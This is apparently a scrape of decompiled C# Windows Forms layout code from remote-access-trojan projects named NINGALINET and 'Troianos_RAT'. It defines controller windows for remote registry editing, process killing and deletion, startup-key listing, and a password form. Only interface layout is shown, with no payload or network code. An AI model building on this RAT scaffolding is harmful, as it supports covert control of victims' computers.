     textBox.Location         = location;
     this.TextBox1.Multiline  = true;
     this.TextBox1.Name       = "TextBox1";
     this.TextBox1.ScrollBars = global::System.Windows.Forms.ScrollBars.Both;
     global::System.Windows.Forms.Control textBox2 = this.TextBox1;
     size                   = new global::System.Drawing.Size(629, 206);
     textBox2.Size          = size;
     this.TextBox1.TabIndex = 1;
     global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 13f);
     this.AutoScaleDimensions = autoScaleDimensions;
     this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
     this.BackColor           = global::System.Drawing.Color.Black;
     size            = new global::System.Drawing.Size(629, 228);
     this.ClientSize = size;
     this.Controls.Add(this.TextBox1);
     this.Controls.Add(this.MenuStrip1);
     this.Icon          = (global::System.Drawing.Icon)componentResourceManager.GetObject("$this.Icon");
     this.MainMenuStrip = this.MenuStrip1;
     this.Name          = "Note";
     this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "Bloco de Notas";
     this.MenuStrip1.ResumeLayout(false);
     this.MenuStrip1.PerformLayout();
     this.ResumeLayout(false);
     this.PerformLayout();
 }
Exemple #18
0
 private void InitializeComponent()
 {
     this.components = new global::System.ComponentModel.Container();
     global::System.ComponentModel.ComponentResourceManager componentResourceManager = new global::System.ComponentModel.ComponentResourceManager(typeof(global::NINGALINET.FrmRegistry));
     global::System.Windows.Forms.TreeNode treeNode  = new global::System.Windows.Forms.TreeNode("HKEY_CLASSES_ROOT");
     global::System.Windows.Forms.TreeNode treeNode2 = new global::System.Windows.Forms.TreeNode("HKEY_CURRENT_USER");
     global::System.Windows.Forms.TreeNode treeNode3 = new global::System.Windows.Forms.TreeNode("HKEY_LOCAL_MACHINE");
     global::System.Windows.Forms.TreeNode treeNode4 = new global::System.Windows.Forms.TreeNode("HKEY_USERS");
     this.crg = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.RefreshToolStripMenuItem1 = new global::System.Windows.Forms.ToolStripMenuItem();
     this.AToolStripMenuItem1       = new global::System.Windows.Forms.ToolStripSeparator();
     this.EditToolStripMenuItem     = new global::System.Windows.Forms.ToolStripMenuItem();
     this.NewValueToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.DeleteToolStripMenuItem   = new global::System.Windows.Forms.ToolStripMenuItem();
     this.l1   = new global::System.Windows.Forms.ImageList(this.components);
     this.RGk  = new global::System.Windows.Forms.TreeView();
     this.crgk = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.RefreshToolStripMenuItem   = new global::System.Windows.Forms.ToolStripMenuItem();
     this.AToolStripMenuItem         = new global::System.Windows.Forms.ToolStripSeparator();
     this.CreateKeyToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.DeleteKeyToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.Timer1        = new global::System.Windows.Forms.Timer(this.components);
     this.RGLIST        = new global::NINGALINET.LV();
     this.ColumnHeader4 = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader5 = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader6 = new global::System.Windows.Forms.ColumnHeader();
     this.pr            = new global::NINGALINET.CHProgressbar();
     this.crg.SuspendLayout();
     this.crgk.SuspendLayout();
     this.SuspendLayout();
     this.crg.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.RefreshToolStripMenuItem1,
         this.AToolStripMenuItem1,
         this.EditToolStripMenuItem,
         this.NewValueToolStripMenuItem,
         this.DeleteToolStripMenuItem
     });
     this.crg.Name = "crg";
     global::System.Windows.Forms.Control arg_1BF_0 = this.crg;
     global::System.Drawing.Size          size      = new global::System.Drawing.Size(153, 120);
     arg_1BF_0.Size = size;
     this.RefreshToolStripMenuItem1.Name = "RefreshToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem arg_1EA_0 = this.RefreshToolStripMenuItem1;
     size           = new global::System.Drawing.Size(152, 22);
     arg_1EA_0.Size = size;
     this.RefreshToolStripMenuItem1.Text = "Refresh";
     this.AToolStripMenuItem1.Name       = "AToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem arg_224_0 = this.AToolStripMenuItem1;
     size           = new global::System.Drawing.Size(149, 6);
     arg_224_0.Size = size;
     this.EditToolStripMenuItem.Name = "EditToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_24F_0 = this.EditToolStripMenuItem;
     size           = new global::System.Drawing.Size(152, 22);
     arg_24F_0.Size = size;
     this.EditToolStripMenuItem.Text     = "Edit";
     this.NewValueToolStripMenuItem.Name = "NewValueToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_28A_0 = this.NewValueToolStripMenuItem;
     size           = new global::System.Drawing.Size(152, 22);
     arg_28A_0.Size = size;
     this.NewValueToolStripMenuItem.Text = "NewValue";
     this.DeleteToolStripMenuItem.Name   = "DeleteToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_2C5_0 = this.DeleteToolStripMenuItem;
     size           = new global::System.Drawing.Size(152, 22);
     arg_2C5_0.Size = size;
     this.DeleteToolStripMenuItem.Text = "Delete";
     this.l1.ImageStream      = (global::System.Windows.Forms.ImageListStreamer)componentResourceManager.GetObject("l1.ImageStream");
     this.l1.TransparentColor = global::System.Drawing.Color.Transparent;
     this.l1.Images.SetKeyName(0, "folder_open.png");
     this.l1.Images.SetKeyName(1, "176.png");
     this.l1.Images.SetKeyName(2, "Icon_5.ico");
     this.RGk.Anchor           = (global::System.Windows.Forms.AnchorStyles.Top | global::System.Windows.Forms.AnchorStyles.Bottom | global::System.Windows.Forms.AnchorStyles.Left | global::System.Windows.Forms.AnchorStyles.Right);
     this.RGk.BackColor        = global::System.Drawing.Color.Black;
     this.RGk.ContextMenuStrip = this.crgk;
     this.RGk.Font             = new global::System.Drawing.Font("Arial", 8f);
     this.RGk.ForeColor        = global::System.Drawing.Color.WhiteSmoke;
     this.RGk.ImageIndex       = 0;
     this.RGk.ImageList        = this.l1;
     global::System.Windows.Forms.Control arg_3CD_0 = this.RGk;
     global::System.Drawing.Point         location  = new global::System.Drawing.Point(0, 0);
     arg_3CD_0.Location   = location;
     this.RGk.Name        = "RGk";
     treeNode.ImageIndex  = -2;
     treeNode.Name        = "HKEY_CLASSES_ROOT";
     treeNode.Text        = "HKEY_CLASSES_ROOT";
     treeNode2.ImageIndex = -2;
     treeNode2.Name       = "HKEY_CURRENT_USER";
     treeNode2.Text       = "HKEY_CURRENT_USER";
     treeNode3.ImageIndex = -2;
     treeNode3.Name       = "HKEY_LOCAL_MACHINE";
     treeNode3.Text       = "HKEY_LOCAL_MACHINE";
     treeNode4.ImageIndex = -2;
     treeNode4.Name       = "HKEY_USERS";
     treeNode4.Text       = "HKEY_USERS";
     this.RGk.Nodes.AddRange(new global::System.Windows.Forms.TreeNode[]
     {
         treeNode,
         treeNode2,
         treeNode3,
         treeNode4
     });
     this.RGk.SelectedImageIndex = 0;
     global::System.Windows.Forms.Control arg_4B1_0 = this.RGk;
     size              = new global::System.Drawing.Size(199, 348);
     arg_4B1_0.Size    = size;
     this.RGk.TabIndex = 12;
     this.crgk.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.RefreshToolStripMenuItem,
         this.AToolStripMenuItem,
         this.CreateKeyToolStripMenuItem,
         this.DeleteKeyToolStripMenuItem
     });
     this.crgk.Name = "crgk";
     global::System.Windows.Forms.Control arg_52B_0 = this.crgk;
     size           = new global::System.Drawing.Size(131, 76);
     arg_52B_0.Size = size;
     this.RefreshToolStripMenuItem.Name = "RefreshToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_556_0 = this.RefreshToolStripMenuItem;
     size           = new global::System.Drawing.Size(130, 22);
     arg_556_0.Size = size;
     this.RefreshToolStripMenuItem.Text = "Refresh";
     this.AToolStripMenuItem.Name       = "AToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_58D_0 = this.AToolStripMenuItem;
     size           = new global::System.Drawing.Size(127, 6);
     arg_58D_0.Size = size;
     this.CreateKeyToolStripMenuItem.Name = "CreateKeyToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_5B8_0 = this.CreateKeyToolStripMenuItem;
     size           = new global::System.Drawing.Size(130, 22);
     arg_5B8_0.Size = size;
     this.CreateKeyToolStripMenuItem.Text = "Create Key";
     this.DeleteKeyToolStripMenuItem.Name = "DeleteKeyToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_5F3_0 = this.DeleteKeyToolStripMenuItem;
     size           = new global::System.Drawing.Size(130, 22);
     arg_5F3_0.Size = size;
     this.DeleteKeyToolStripMenuItem.Text = "Delete Key";
     this.RGLIST.Anchor      = (global::System.Windows.Forms.AnchorStyles.Top | global::System.Windows.Forms.AnchorStyles.Bottom | global::System.Windows.Forms.AnchorStyles.Left | global::System.Windows.Forms.AnchorStyles.Right);
     this.RGLIST.BackColor   = global::System.Drawing.Color.Black;
     this.RGLIST.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
     this.RGLIST.Columns.AddRange(new global::System.Windows.Forms.ColumnHeader[]
     {
         this.ColumnHeader4,
         this.ColumnHeader5,
         this.ColumnHeader6
     });
     this.RGLIST.ContextMenuStrip = this.crg;
     this.RGLIST.Font             = new global::System.Drawing.Font("Arial", 8f);
     this.RGLIST.ForeColor        = global::System.Drawing.Color.WhiteSmoke;
     this.RGLIST.FullRowSelect    = true;
     global::System.Windows.Forms.Control arg_6C5_0 = this.RGLIST;
     location              = new global::System.Drawing.Point(200, 0);
     arg_6C5_0.Location    = location;
     this.RGLIST.Name      = "RGLIST";
     this.RGLIST.OwnerDraw = true;
     global::System.Windows.Forms.Control arg_6FF_0 = this.RGLIST;
     size                       = new global::System.Drawing.Size(384, 348);
     arg_6FF_0.Size             = size;
     this.RGLIST.SmallImageList = this.l1;
     this.RGLIST.TabIndex       = 14;
     this.RGLIST.UseCompatibleStateImageBehavior = false;
     this.RGLIST.View         = global::System.Windows.Forms.View.Details;
     this.ColumnHeader4.Text  = "Name";
     this.ColumnHeader5.Text  = "Type";
     this.ColumnHeader6.Text  = "Value";
     this.ColumnHeader6.Width = 274;
     this.pr.BackColor        = global::System.Drawing.Color.Transparent;
     this.pr.Colors           = new global::NINGALINET.Bloom[0];
     this.pr.Customization    = global::NINGALINET.My.Resources.Resources.notf;
     this.pr.Dock             = global::System.Windows.Forms.DockStyle.Bottom;
     this.pr.Font             = new global::System.Drawing.Font("Verdana", 8f);
     this.pr.Image            = null;
     global::System.Windows.Forms.Control arg_7F2_0 = this.pr;
     location           = new global::System.Drawing.Point(0, 347);
     arg_7F2_0.Location = location;
     this.pr.Maximum    = 100;
     this.pr.Name       = "pr";
     this.pr.NoRounding = false;
     global::System.Windows.Forms.Control arg_836_0 = this.pr;
     size                = new global::System.Drawing.Size(584, 15);
     arg_836_0.Size      = size;
     this.pr.TabIndex    = 17;
     this.pr.Text        = "ChProgressbar1";
     this.pr.Transparent = true;
     this.pr.Value       = 0;
     global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 13f);
     this.AutoScaleDimensions = autoScaleDimensions;
     this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
     this.BackColor           = global::System.Drawing.Color.Black;
     size            = new global::System.Drawing.Size(584, 362);
     this.ClientSize = size;
     this.Controls.Add(this.pr);
     this.Controls.Add(this.RGLIST);
     this.Controls.Add(this.RGk);
     this.Name          = "FrmRegistry";
     this.ShowIcon      = false;
     this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "Regedit";
     this.crg.ResumeLayout(false);
     this.crgk.ResumeLayout(false);
     this.ResumeLayout(false);
 }
Exemple #19
0
 private void InitializeComponent()
 {
     this.components = new global::System.ComponentModel.Container();
     global::System.ComponentModel.ComponentResourceManager componentResourceManager = new global::System.ComponentModel.ComponentResourceManager(typeof(global::NINGALINET.FrmProcess));
     this.M1 = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.RefreshToolStripMenuItem    = new global::System.Windows.Forms.ToolStripMenuItem();
     this.AToolStripMenuItem          = new global::System.Windows.Forms.ToolStripSeparator();
     this.NewToolStripMenuItem        = new global::System.Windows.Forms.ToolStripMenuItem();
     this.KillToolStripMenuItem       = new global::System.Windows.Forms.ToolStripMenuItem();
     this.KillDeleteToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.AToolStripMenuItem1         = new global::System.Windows.Forms.ToolStripSeparator();
     this.SuspendToolStripMenuItem    = new global::System.Windows.Forms.ToolStripMenuItem();
     this.ResumeToolStripMenuItem     = new global::System.Windows.Forms.ToolStripMenuItem();
     this.Timer1        = new global::System.Windows.Forms.Timer(this.components);
     this.ImageList1    = new global::System.Windows.Forms.ImageList(this.components);
     this.StatusStrip1  = new global::System.Windows.Forms.StatusStrip();
     this.SL            = new global::System.Windows.Forms.ToolStripStatusLabel();
     this.pr            = new global::NINGALINET.CHProgressbar();
     this.L1            = new global::NINGALINET.LV();
     this.ColumnHeader3 = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader4 = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader5 = new global::System.Windows.Forms.ColumnHeader();
     this.M1.SuspendLayout();
     this.StatusStrip1.SuspendLayout();
     this.SuspendLayout();
     this.M1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.RefreshToolStripMenuItem,
         this.AToolStripMenuItem,
         this.NewToolStripMenuItem,
         this.KillToolStripMenuItem,
         this.KillDeleteToolStripMenuItem,
         this.AToolStripMenuItem1,
         this.SuspendToolStripMenuItem,
         this.ResumeToolStripMenuItem
     });
     this.M1.Name = "M1";
     global::System.Windows.Forms.Control arg_197_0 = this.M1;
     global::System.Drawing.Size          size      = new global::System.Drawing.Size(153, 170);
     arg_197_0.Size = size;
     this.RefreshToolStripMenuItem.Name = "RefreshToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_1C1_0 = this.RefreshToolStripMenuItem;
     size           = new global::System.Drawing.Size(152, 22);
     arg_1C1_0.Size = size;
     this.RefreshToolStripMenuItem.Text = "Refresh";
     this.AToolStripMenuItem.Name       = "AToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_1FA_0 = this.AToolStripMenuItem;
     size           = new global::System.Drawing.Size(149, 6);
     arg_1FA_0.Size = size;
     this.NewToolStripMenuItem.Name = "NewToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_224_0 = this.NewToolStripMenuItem;
     size           = new global::System.Drawing.Size(152, 22);
     arg_224_0.Size = size;
     this.NewToolStripMenuItem.Text  = "New";
     this.KillToolStripMenuItem.Name = "KillToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_25E_0 = this.KillToolStripMenuItem;
     size           = new global::System.Drawing.Size(152, 22);
     arg_25E_0.Size = size;
     this.KillToolStripMenuItem.Text       = "Kill ";
     this.KillDeleteToolStripMenuItem.Name = "KillDeleteToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_298_0 = this.KillDeleteToolStripMenuItem;
     size           = new global::System.Drawing.Size(152, 22);
     arg_298_0.Size = size;
     this.KillDeleteToolStripMenuItem.Text = "Kill + Delete";
     this.AToolStripMenuItem1.Name         = "AToolStripMenuItem1";
     global::System.Windows.Forms.ToolStripItem arg_2D1_0 = this.AToolStripMenuItem1;
     size           = new global::System.Drawing.Size(149, 6);
     arg_2D1_0.Size = size;
     this.SuspendToolStripMenuItem.Name = "SuspendToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_2FB_0 = this.SuspendToolStripMenuItem;
     size           = new global::System.Drawing.Size(152, 22);
     arg_2FB_0.Size = size;
     this.SuspendToolStripMenuItem.Text = "Suspend";
     this.ResumeToolStripMenuItem.Name  = "ResumeToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_335_0 = this.ResumeToolStripMenuItem;
     size           = new global::System.Drawing.Size(152, 22);
     arg_335_0.Size = size;
     this.ResumeToolStripMenuItem.Text = "Resume ";
     this.ImageList1.ImageStream       = (global::System.Windows.Forms.ImageListStreamer)componentResourceManager.GetObject("ImageList1.ImageStream");
     this.ImageList1.TransparentColor  = global::System.Drawing.Color.Transparent;
     this.ImageList1.Images.SetKeyName(0, "95.png");
     this.ImageList1.Images.SetKeyName(1, "114.png");
     this.ImageList1.Images.SetKeyName(2, "2.png");
     this.StatusStrip1.BackColor = global::System.Drawing.Color.Black;
     this.StatusStrip1.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.SL
     });
     global::System.Windows.Forms.Control arg_3FC_0 = this.StatusStrip1;
     global::System.Drawing.Point         location  = new global::System.Drawing.Point(0, 340);
     arg_3FC_0.Location     = location;
     this.StatusStrip1.Name = "StatusStrip1";
     global::System.Windows.Forms.Control arg_426_0 = this.StatusStrip1;
     size           = new global::System.Drawing.Size(584, 22);
     arg_426_0.Size = size;
     this.StatusStrip1.SizingGrip = false;
     this.StatusStrip1.TabIndex   = 24;
     this.StatusStrip1.Text       = "StatusStrip1";
     this.SL.ForeColor            = global::System.Drawing.Color.WhiteSmoke;
     this.SL.Name = "SL";
     global::System.Windows.Forms.ToolStripItem arg_486_0 = this.SL;
     size                  = new global::System.Drawing.Size(13, 17);
     arg_486_0.Size        = size;
     this.SL.Text          = "..";
     this.pr.BackColor     = global::System.Drawing.Color.Transparent;
     this.pr.Colors        = new global::NINGALINET.Bloom[0];
     this.pr.Customization = global::NINGALINET.My.Resources.Resources.notf;
     this.pr.Dock          = global::System.Windows.Forms.DockStyle.Bottom;
     this.pr.Font          = new global::System.Drawing.Font("Verdana", 8f);
     this.pr.Image         = null;
     global::System.Windows.Forms.Control arg_512_0 = this.pr;
     location           = new global::System.Drawing.Point(0, 325);
     arg_512_0.Location = location;
     this.pr.Maximum    = 100;
     this.pr.Name       = "pr";
     this.pr.NoRounding = false;
     global::System.Windows.Forms.Control arg_555_0 = this.pr;
     size                = new global::System.Drawing.Size(584, 15);
     arg_555_0.Size      = size;
     this.pr.TabIndex    = 25;
     this.pr.Text        = "ChProgressbar1";
     this.pr.Transparent = true;
     this.pr.Value       = 0;
     this.L1.BackColor   = global::System.Drawing.Color.Black;
     this.L1.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
     this.L1.Columns.AddRange(new global::System.Windows.Forms.ColumnHeader[]
     {
         this.ColumnHeader3,
         this.ColumnHeader4,
         this.ColumnHeader5
     });
     this.L1.ContextMenuStrip = this.M1;
     this.L1.Dock             = global::System.Windows.Forms.DockStyle.Fill;
     this.L1.Font             = new global::System.Drawing.Font("Arial", 8f);
     this.L1.ForeColor        = global::System.Drawing.Color.WhiteSmoke;
     this.L1.FullRowSelect    = true;
     global::System.Windows.Forms.Control arg_646_0 = this.L1;
     location           = new global::System.Drawing.Point(0, 0);
     arg_646_0.Location = location;
     this.L1.Name       = "L1";
     this.L1.OwnerDraw  = true;
     global::System.Windows.Forms.Control arg_67F_0 = this.L1;
     size             = new global::System.Drawing.Size(584, 325);
     arg_67F_0.Size   = size;
     this.L1.TabIndex = 26;
     this.L1.UseCompatibleStateImageBehavior = false;
     this.L1.View             = global::System.Windows.Forms.View.Details;
     this.ColumnHeader3.Text  = "Name";
     this.ColumnHeader4.Text  = "PID";
     this.ColumnHeader5.Text  = "Locations";
     this.ColumnHeader5.Width = 530;
     global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 13f);
     this.AutoScaleDimensions = autoScaleDimensions;
     this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
     this.BackColor           = global::System.Drawing.Color.Black;
     size            = new global::System.Drawing.Size(584, 362);
     this.ClientSize = size;
     this.Controls.Add(this.L1);
     this.Controls.Add(this.pr);
     this.Controls.Add(this.StatusStrip1);
     this.Name          = "FrmProcess";
     this.ShowIcon      = false;
     this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "Proc";
     this.M1.ResumeLayout(false);
     this.StatusStrip1.ResumeLayout(false);
     this.StatusStrip1.PerformLayout();
     this.ResumeLayout(false);
     this.PerformLayout();
 }
 private void InitializeComponent()
 {
     this.components = new global::System.ComponentModel.Container();
     global::System.ComponentModel.ComponentResourceManager componentResourceManager = new global::System.ComponentModel.ComponentResourceManager(typeof(global::NINGALINET.FrmStartUp));
     global::System.Windows.Forms.ListViewGroup             listViewGroup            = new global::System.Windows.Forms.ListViewGroup("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", global::System.Windows.Forms.HorizontalAlignment.Left);
     global::System.Windows.Forms.ListViewGroup             listViewGroup2           = new global::System.Windows.Forms.ListViewGroup("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", global::System.Windows.Forms.HorizontalAlignment.Left);
     global::System.Windows.Forms.ListViewGroup             listViewGroup3           = new global::System.Windows.Forms.ListViewGroup("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", global::System.Windows.Forms.HorizontalAlignment.Left);
     global::System.Windows.Forms.ListViewGroup             listViewGroup4           = new global::System.Windows.Forms.ListViewGroup("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", global::System.Windows.Forms.HorizontalAlignment.Left);
     global::System.Windows.Forms.ListViewGroup             listViewGroup5           = new global::System.Windows.Forms.ListViewGroup("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", global::System.Windows.Forms.HorizontalAlignment.Left);
     global::System.Windows.Forms.ListViewGroup             listViewGroup6           = new global::System.Windows.Forms.ListViewGroup("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", global::System.Windows.Forms.HorizontalAlignment.Left);
     global::System.Windows.Forms.ListViewGroup             listViewGroup7           = new global::System.Windows.Forms.ListViewGroup("Startup Folder ", global::System.Windows.Forms.HorizontalAlignment.Left);
     this.CM = new global::System.Windows.Forms.ContextMenuStrip(this.components);
     this.AtualizarToolStripMenuItem = new global::System.Windows.Forms.ToolStripMenuItem();
     this.AToolStripMenuItem         = new global::System.Windows.Forms.ToolStripSeparator();
     this.ExcluirToolStripMenuItem   = new global::System.Windows.Forms.ToolStripMenuItem();
     this.IM            = new global::System.Windows.Forms.ImageList(this.components);
     this.Timer1        = new global::System.Windows.Forms.Timer(this.components);
     this.pr            = new global::NINGALINET.CHProgressbar();
     this.sl            = new global::System.Windows.Forms.ToolStripStatusLabel();
     this.ST            = new global::System.Windows.Forms.StatusStrip();
     this.ListView1     = new global::NINGALINET.LV();
     this.ColumnHeader3 = new global::System.Windows.Forms.ColumnHeader();
     this.ColumnHeader4 = new global::System.Windows.Forms.ColumnHeader();
     this.CM.SuspendLayout();
     this.ST.SuspendLayout();
     this.SuspendLayout();
     this.CM.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.AtualizarToolStripMenuItem,
         this.AToolStripMenuItem,
         this.ExcluirToolStripMenuItem
     });
     this.CM.Name = "CM";
     global::System.Windows.Forms.Control arg_183_0 = this.CM;
     global::System.Drawing.Size          size      = new global::System.Drawing.Size(153, 76);
     arg_183_0.Size = size;
     this.AtualizarToolStripMenuItem.Name = "AtualizarToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_1AE_0 = this.AtualizarToolStripMenuItem;
     size           = new global::System.Drawing.Size(152, 22);
     arg_1AE_0.Size = size;
     this.AtualizarToolStripMenuItem.Text = "Refresh";
     this.AToolStripMenuItem.Name         = "AToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_1E8_0 = this.AToolStripMenuItem;
     size           = new global::System.Drawing.Size(149, 6);
     arg_1E8_0.Size = size;
     this.ExcluirToolStripMenuItem.Name = "ExcluirToolStripMenuItem";
     global::System.Windows.Forms.ToolStripItem arg_213_0 = this.ExcluirToolStripMenuItem;
     size           = new global::System.Drawing.Size(152, 22);
     arg_213_0.Size = size;
     this.ExcluirToolStripMenuItem.Text = "Remove";
     this.IM.ImageStream      = (global::System.Windows.Forms.ImageListStreamer)componentResourceManager.GetObject("IM.ImageStream");
     this.IM.TransparentColor = global::System.Drawing.Color.Transparent;
     this.IM.Images.SetKeyName(0, "176.png");
     this.IM.Images.SetKeyName(1, "177.png");
     this.IM.Images.SetKeyName(2, "178.png");
     this.pr.BackColor     = global::System.Drawing.Color.Transparent;
     this.pr.Colors        = new global::NINGALINET.Bloom[0];
     this.pr.Customization = global::NINGALINET.My.Resources.Resources.notf;
     this.pr.Dock          = global::System.Windows.Forms.DockStyle.Bottom;
     this.pr.Font          = new global::System.Drawing.Font("Verdana", 8f);
     this.pr.Image         = null;
     global::System.Windows.Forms.Control arg_30D_0 = this.pr;
     global::System.Drawing.Point         location  = new global::System.Drawing.Point(0, 325);
     arg_30D_0.Location = location;
     this.pr.Maximum    = 100;
     this.pr.Name       = "pr";
     this.pr.NoRounding = false;
     global::System.Windows.Forms.Control arg_351_0 = this.pr;
     size                = new global::System.Drawing.Size(584, 15);
     arg_351_0.Size      = size;
     this.pr.TabIndex    = 3;
     this.pr.Text        = "ChProgressbar1";
     this.pr.Transparent = true;
     this.pr.Value       = 0;
     this.sl.Name        = "sl";
     global::System.Windows.Forms.ToolStripItem arg_3AD_0 = this.sl;
     size              = new global::System.Drawing.Size(13, 17);
     arg_3AD_0.Size    = size;
     this.sl.Text      = "..";
     this.ST.BackColor = global::System.Drawing.Color.Black;
     this.ST.Items.AddRange(new global::System.Windows.Forms.ToolStripItem[]
     {
         this.sl
     });
     global::System.Windows.Forms.Control arg_40B_0 = this.ST;
     location           = new global::System.Drawing.Point(0, 340);
     arg_40B_0.Location = location;
     this.ST.Name       = "ST";
     global::System.Windows.Forms.Control arg_436_0 = this.ST;
     size                       = new global::System.Drawing.Size(584, 22);
     arg_436_0.Size             = size;
     this.ST.SizingGrip         = false;
     this.ST.TabIndex           = 1;
     this.ListView1.BackColor   = global::System.Drawing.Color.Black;
     this.ListView1.BorderStyle = global::System.Windows.Forms.BorderStyle.None;
     this.ListView1.Columns.AddRange(new global::System.Windows.Forms.ColumnHeader[]
     {
         this.ColumnHeader3,
         this.ColumnHeader4
     });
     this.ListView1.ContextMenuStrip = this.CM;
     this.ListView1.Dock             = global::System.Windows.Forms.DockStyle.Fill;
     this.ListView1.Font             = new global::System.Drawing.Font("Arial", 8f);
     this.ListView1.ForeColor        = global::System.Drawing.Color.WhiteSmoke;
     this.ListView1.FullRowSelect    = true;
     listViewGroup.Header            = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run";
     listViewGroup.Name    = "Group1";
     listViewGroup2.Header = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce";
     listViewGroup2.Name   = "Group2";
     listViewGroup3.Header = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run";
     listViewGroup3.Name   = "Group3";
     listViewGroup4.Header = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
     listViewGroup4.Name   = "Group4";
     listViewGroup5.Header = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce";
     listViewGroup5.Name   = "Group5";
     listViewGroup6.Header = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run";
     listViewGroup6.Name   = "Group6";
     listViewGroup7.Header = "Startup Folder ";
     listViewGroup7.Name   = "Group7";
     this.ListView1.Groups.AddRange(new global::System.Windows.Forms.ListViewGroup[]
     {
         listViewGroup,
         listViewGroup2,
         listViewGroup3,
         listViewGroup4,
         listViewGroup5,
         listViewGroup6,
         listViewGroup7
     });
     this.ListView1.LargeImageList = this.IM;
     global::System.Windows.Forms.Control arg_5F5_0 = this.ListView1;
     location                 = new global::System.Drawing.Point(0, 0);
     arg_5F5_0.Location       = location;
     this.ListView1.Name      = "ListView1";
     this.ListView1.OwnerDraw = true;
     global::System.Windows.Forms.Control arg_62F_0 = this.ListView1;
     size           = new global::System.Drawing.Size(584, 325);
     arg_62F_0.Size = size;
     this.ListView1.SmallImageList = this.IM;
     this.ListView1.TabIndex       = 4;
     this.ListView1.UseCompatibleStateImageBehavior = false;
     this.ListView1.View     = global::System.Windows.Forms.View.Details;
     this.ColumnHeader3.Text = "Name";
     this.ColumnHeader4.Text = "Descriptions";
     global::System.Drawing.SizeF autoScaleDimensions = new global::System.Drawing.SizeF(6f, 13f);
     this.AutoScaleDimensions = autoScaleDimensions;
     this.AutoScaleMode       = global::System.Windows.Forms.AutoScaleMode.Font;
     this.BackColor           = global::System.Drawing.Color.Black;
     size            = new global::System.Drawing.Size(584, 362);
     this.ClientSize = size;
     this.Controls.Add(this.ListView1);
     this.Controls.Add(this.pr);
     this.Controls.Add(this.ST);
     this.ForeColor     = global::System.Drawing.Color.White;
     this.Name          = "FrmStartUp";
     this.ShowIcon      = false;
     this.StartPosition = global::System.Windows.Forms.FormStartPosition.CenterScreen;
     this.Text          = "StartUp";
     this.CM.ResumeLayout(false);
     this.ST.ResumeLayout(false);
     this.ST.PerformLayout();
     this.ResumeLayout(false);
     this.PerformLayout();
 }
 private void InitializeComponent()
 {
     this.components = new global::System.ComponentModel.Container();
     global::System.ComponentModel.ComponentResourceManager componentResourceManager = new global::System.ComponentModel.ComponentResourceManager(typeof(global::Troianos_RAT.Pass));
     this.ContextMenuStrip1                    = new global::System.Windows.Forms.ContextMenuStrip(this.components);
